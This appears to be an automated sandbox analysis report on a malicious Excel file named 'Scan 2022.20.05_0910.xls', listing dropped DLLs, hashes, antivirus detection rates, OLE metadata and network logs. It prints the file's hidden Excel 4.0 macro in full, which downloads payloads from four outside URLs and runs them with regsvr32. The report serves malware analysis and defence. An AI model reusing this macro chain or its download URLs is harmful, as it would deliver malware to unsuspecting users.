                                                                  SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTs+0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVO:i5MR9M6y3TsrRIvgMSS3AyUrhYu3j
                                                                  MD5:EB2D8E105A7A5FBB94CD39848C0B0BC1
                                                                  SHA1:21BA3DFB8AA182350CD3EA7CAFB216DFB569EF0C
                                                                  SHA-256:3D4A04171182D15A097CC440BABF14582EB0956335AC0C93D7A67225D9E80087
                                                                  SHA-512:F0982C373F67A7EDDA6C9CC8B188CC350D19513A77F7F6E2B283132A317126DCA9621F9CA9E23FE28036592B25EBE337A67B49F3775B60FF4E544EA52E549EF0
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: Metadefender, Detection: 34%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 42%
                                                                  IE Cache URL:http://kuluckaci.com/yarisma/cgi-bin/aIuI4Ukdtl730sP1F/
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):1536
                                                                  Entropy (8bit):1.1464700112623651
                                                                  Encrypted:false
                                                                  SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                  MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                  SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                  SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                  SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                  Malicious:false
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                  File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                                  Category:dropped
                                                                  Size (bytes):61480
                                                                  Entropy (8bit):7.9951219482618905
                                                                  Encrypted:true
                                                                  SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                                                  MD5:B9F21D8DB36E88831E5352BB82C438B3
                                                                  SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                                                  SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                                                  SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                                                  Malicious:false
                                                                  Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...
                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):162196
                                                                  Entropy (8bit):6.301436092020807
                                                                  Encrypted:false
                                                                  SSDEEP:1536:Nga6crtilgCyNY2Ip/5ib6NWdm1wpzru2RPZz04D8rlCMiB3XlMc:Na0imCy/dm0zru2RN97MiVGc
                                                                  MD5:E721613517543768F0DE47A6EEEE3475
                                                                  SHA1:3FFC13E3157CF6EB9E9CCAB57B9058209AF41D69
                                                                  SHA-256:3163B82D1289693122EF99ED6C3C1911F68AA2A7296907CEBF84C897141CED4E
                                                                  SHA-512:E097CAB58C5E390FDC2DB03A59329A548A60069804487828B70519A403622260E57F10B09D9DDAEEB3C31491FE32221FB67965C490771A3D42E45EBB8BE26587
                                                                  Malicious:false
                                                                  Preview:0..y...*.H.........y.0..yz...1.0...`.H.e......0..i...+.....7.....i.0..i.0...+.....7........SiU[v...220418211447Z0...+......0..i.0..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):28672
                                                                  Entropy (8bit):3.4818375138006856
                                                                  Encrypted:false
                                                                  SSDEEP:768:0kMKpb8rGYrMPe3q7Q0XV5xtezEs/68/dgATO9s1XS:0fKpb8rGYrMPe3q7Q0XV5xtezEsi8/da
                                                                  MD5:79604F8B12BBF9C72D44D2922D3DF91F
                                                                  SHA1:A70A9932C6BCC805F4D0041DD16E1AE6E970FAAB
                                                                  SHA-256:04F3ED3D4F8811EC35B469E3443EE6A68C18ABC42A67E65D0F785CF187334687
                                                                  SHA-512:B3F0CF5B45D4DA6028471BD97D306E82410BAB397C0BB8EA749B3E4FD95B4DDBB080A4CEBC861AA9246D627D4081454F78D4AFD853E6BF90F307404845B34347
                                                                  Malicious:false
                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Thu May 19 22:08:10 2022, Security: 0
                                                                  Category:dropped
                                                                  Size (bytes):69120
                                                                  Entropy (8bit):6.420771368581711
                                                                  Encrypted:false
                                                                  SSDEEP:1536:qfKpb8rGYrMPe3q7Q0XV5xtezEsi8/dg79s1a6YG2jzQ0viPvDNHhnN:4Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgs
                                                                  MD5:BE5EE29E70C42F01D8C4041011F28138
                                                                  SHA1:EBCBB7BF42B589F37C91DA7E60FAD6DE281B004E
                                                                  SHA-256:45C49D49EB57E3B2A851E276BA3A45AD22D46C31969E282537F3D302CA1C6C05
                                                                  SHA-512:1DA5057D569E8513FEC612059418628256944A6B3827BB1AD5FF79DB912A278196B75BB35B5DE67329A5E2EAB9001307368CBF696BAC890916E65AD4352D2BA3
                                                                  Malicious:true
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....userTH B.....a.........=.................................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):365056
                                                                  Entropy (8bit):7.15810876493923
                                                                  Encrypted:false
                                                                  SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTC0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TPRIvgMSS3AyUrhYu3j
                                                                  MD5:CEA8BCCAAFA4CAD4EE2B6E9C3BD9C5C0
                                                                  SHA1:88380A35FFC07852B9FACEFF786267DF969A0488
                                                                  SHA-256:BAC00AC59383049CF72FC97827D2C8D773FF1ACFC7A132630B133EEDAF9A8241
                                                                  SHA-512:A2048D39C24CE94A1D1DF97C577A30A5FAF7573ADC80517381AFDBE769C0D0AF46EDA34B9E897766802440D535DA507EB8C520BD65E13F9D599490EC79836956
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 65%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):365056
                                                                  Entropy (8bit):7.158108067630563
                                                                  Encrypted:false
                                                                  SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTs+0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVO:i5MR9M6y3TsrRIvgMSS3AyUrhYu3j
                                                                  MD5:EB2D8E105A7A5FBB94CD39848C0B0BC1
                                                                  SHA1:21BA3DFB8AA182350CD3EA7CAFB216DFB569EF0C
                                                                  SHA-256:3D4A04171182D15A097CC440BABF14582EB0956335AC0C93D7A67225D9E80087
                                                                  SHA-512:F0982C373F67A7EDDA6C9CC8B188CC350D19513A77F7F6E2B283132A317126DCA9621F9CA9E23FE28036592B25EBE337A67B49F3775B60FF4E544EA52E549EF0
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: Metadefender, Detection: 34%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 42%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):365056
                                                                  Entropy (8bit):7.158088154364803
                                                                  Encrypted:false
                                                                  SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcT50JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TYRIvgMSS3AyUrhYu3j
                                                                  MD5:415A33A830691C3A730AE345F14C7F30
                                                                  SHA1:B6FBFAB79E9DE7B81E692149E8059113169AC374
                                                                  SHA-256:47F24531BCBBF0C36792AF57CEB134B25E2481AE20B53D74283FBA4E542261BA
                                                                  SHA-512:0C92DC9608770EE109C7641B0F46E151CC06A9EE5B8789BC9498C8879E12C1515D46F8F320D54B10DF292121867EA4080C93D2951C1B57C816D6E37D7BA26731
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: Metadefender, Detection: 29%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 40%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):365056
                                                                  Entropy (8bit):7.158108067630563
                                                                  Encrypted:false
                                                                  SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTs+0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVO:i5MR9M6y3TsrRIvgMSS3AyUrhYu3j
                                                                  MD5:EB2D8E105A7A5FBB94CD39848C0B0BC1
                                                                  SHA1:21BA3DFB8AA182350CD3EA7CAFB216DFB569EF0C
                                                                  SHA-256:3D4A04171182D15A097CC440BABF14582EB0956335AC0C93D7A67225D9E80087
                                                                  SHA-512:F0982C373F67A7EDDA6C9CC8B188CC350D19513A77F7F6E2B283132A317126DCA9621F9CA9E23FE28036592B25EBE337A67B49F3775B60FF4E544EA52E549EF0
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Metadefender, Detection: 34%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 42%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):365056
                                                                  Entropy (8bit):7.158088154364803
                                                                  Encrypted:false
                                                                  SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcT50JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TYRIvgMSS3AyUrhYu3j
                                                                  MD5:415A33A830691C3A730AE345F14C7F30
                                                                  SHA1:B6FBFAB79E9DE7B81E692149E8059113169AC374
                                                                  SHA-256:47F24531BCBBF0C36792AF57CEB134B25E2481AE20B53D74283FBA4E542261BA
                                                                  SHA-512:0C92DC9608770EE109C7641B0F46E151CC06A9EE5B8789BC9498C8879E12C1515D46F8F320D54B10DF292121867EA4080C93D2951C1B57C816D6E37D7BA26731
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Metadefender, Detection: 29%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 40%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):365056
                                                                  Entropy (8bit):7.15810876493923
                                                                  Encrypted:false
                                                                  SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTC0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TPRIvgMSS3AyUrhYu3j
                                                                  MD5:CEA8BCCAAFA4CAD4EE2B6E9C3BD9C5C0
                                                                  SHA1:88380A35FFC07852B9FACEFF786267DF969A0488
                                                                  SHA-256:BAC00AC59383049CF72FC97827D2C8D773FF1ACFC7A132630B133EEDAF9A8241
                                                                  SHA-512:A2048D39C24CE94A1D1DF97C577A30A5FAF7573ADC80517381AFDBE769C0D0AF46EDA34B9E897766802440D535DA507EB8C520BD65E13F9D599490EC79836956
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 65%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Thu May 19 22:08:10 2022, Security: 0
                                                                  Entropy (8bit):6.420547006537839
                                                                  TrID:
                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                  File name:Scan 2022.20.05_0910.xls
                                                                  File size:69138
                                                                  MD5:93ba39759e944e0a660cf1a72919ff59
                                                                  SHA1:0d87f3752893a11174df5d1222215014e59d0fd5
                                                                  SHA256:72d8274eff2d60af4d452efbfb42abf5ce3ac64ea949772350b3c628c842941a
                                                                  SHA512:b6d2eed03b0fb53a0a99f5a7225de804228469a58a7c802c047ad75b1578280de718d5aa08e44464162b9290491ee91e4b3b5e591e5a451cb1be7cf9e978f670
                                                                  SSDEEP:1536:dfKpb8rGYrMPe3q7Q0XV5xtezEsi8/dg79s1a6YG2jzQ0viPvDNHhnOu:9Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgy
                                                                  TLSH:CC635B427A59C92DF914D33549D74BA97317FC318F6B0A833225B324AFFD8A09A0761B
                                                                  File Content Preview:........................>......................................................................................................................................................................................................................................
                                                                  Icon Hash:e4eea286a4b4bcb4
                                                                  Document Type:OLE
                                                                  Number of OLE Files:1
                                                                  Has Summary Info:
                                                                  Application Name:Microsoft Excel
                                                                  Encrypted Document:False
                                                                  Contains Word Document Stream:False
                                                                  Contains Workbook/Book Stream:True
                                                                  Contains PowerPoint Document Stream:False
                                                                  Contains Visio Document Stream:False
                                                                  Contains ObjectPool Stream:False
                                                                  Flash Objects Count:0
                                                                  Contains VBA Macros:False
                                                                  Code Page:1251
                                                                  Author:Dream
                                                                  Last Saved By:TYHRETH
                                                                  Create Time:2015-06-05 18:19:34
                                                                  Last Saved Time:2022-05-19 21:08:10
                                                                  Creating Application:Microsoft Excel
                                                                  Security:0
                                                                  Document Code Page:1251
                                                                  Thumbnail Scaling Desired:False
                                                                  Company:
                                                                  Contains Dirty Links:False
                                                                  Shared Document:False
                                                                  Changed Hyperlinks:False
                                                                  Application Version:1048576
                                                                  General
                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                  File Type:data
                                                                  Stream Size:4096
                                                                  Entropy:0.404258978601
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . E S R S G B 1 . . . . . E G S H R H V 2 . . . . . E S H V G R E R 3 . . . . . P K E K P P G
                                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 18 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 d7 00 00 00
                                                                  General
                                                                  Stream Path:\x5SummaryInformation
                                                                  File Type:data
                                                                  Stream Size:4096
                                                                  Entropy:0.281284383303
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D r e a m . . . . . . . . . . . T Y H R E T H . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . Y * . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                  General
                                                                  Stream Path:Workbook
                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                  Stream Size:58381
                                                                  Entropy:7.10162880813
                                                                  Base64 Encoded:True
                                                                  Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T Y H R E T H B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @ . . . . . . . . . . . " . . .
                                                                  Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 07 00 00 54 59 48 52 45 54 48 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                  Name:PKEKPPGEKKPGE
                                                                  Type:4
                                                                  Final:False
                                                                  Visible:False
                                                                  Protected:False
                                                                  PKEKPPGEKKPGE4False0Falsepre7,5,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://microlent.com/admin/3/","..\uxevr1.ocx",0,0)",F11)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx")",F13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kuluckaci.com/yarisma/cgi-bin/aIuI4Ukdtl730sP1F/","..\uxevr2.ocx",0,0)",F15)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx")",F17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://mcapublicschool.com/Achievements/r4psv/","..\uxevr3.ocx",0,0)",F19)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx")",F21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moorworld.com/aspnet_client/fTDJOdTa1USKl43wFtnb/","..\uxevr4.ocx",0,0)",F23)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx")",F25)=FORMULA("=RETURN()",F29)
                                                                  Name:PKEKPPGEKKPGE
                                                                  Type:4
                                                                  Final:False
                                                                  Visible:False
                                                                  Protected:False
                                                                  PKEKPPGEKKPGE4False0Falsepost7,5,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://microlent.com/admin/3/","..\uxevr1.ocx",0,0)",F11)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx")",F13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kuluckaci.com/yarisma/cgi-bin/aIuI4Ukdtl730sP1F/","..\uxevr2.ocx",0,0)",F15)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx")",F17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://mcapublicschool.com/Achievements/r4psv/","..\uxevr3.ocx",0,0)",F19)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx")",F21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moorworld.com/aspnet_client/fTDJOdTa1USKl43wFtnb/","..\uxevr4.ocx",0,0)",F23)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx")",F25)=FORMULA("=RETURN()",F29)10,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://microlent.com/admin/3/","..\uxevr1.ocx",0,0)12,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx")14,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kuluckaci.com/yarisma/cgi-bin/aIuI4Ukdtl730sP1F/","..\uxevr2.ocx",0,0)16,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx")18,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://mcapublicschool.com/Achievements/r4psv/","..\uxevr3.ocx",0,0)20,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx")22,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moorworld.com/aspnet_client/fTDJOdTa1USKl43wFtnb/","..\uxevr4.ocx",0,0)24,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx")28,5,=RETURN()
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 23, 2022 09:56:37.697509050 CEST49173443192.168.2.22103.195.4.8
                                                                  May 23, 2022 09:56:37.697566986 CEST44349173103.195.4.8192.168.2.22
                                                                  May 23, 2022 09:56:37.697668076 CEST49173443192.168.2.22103.195.4.8
                                                                  May 23, 2022 09:56:37.718632936 CEST49173443192.168.2.22103.195.4.8
                                                                  May 23, 2022 09:56:37.718678951 CEST44349173103.195.4.8192.168.2.22
                                                                  May 23, 2022 09:56:38.310031891 CEST44349173103.195.4.8192.168.2.22
                                                                  May 23, 2022 09:56:38.310261011 CEST49173443192.168.2.22103.195.4.8
                                                                  May 23, 2022 09:56:38.326199055 CEST49173443192.168.2.22103.195.4.8
                                                                  May 23, 2022 09:56:38.326229095 CEST44349173103.195.4.8192.168.2.22
                                                                  May 23, 2022 09:56:38.326577902 CEST44349173103.195.4.8192.168.2.22
                                                                  May 23, 2022 09:56:38.326711893 CEST49173443192.168.2.22103.195.4.8
                                                                  May 23, 2022 09:56:38.561959982 CEST49173443192.168.2.22103.195.4.8
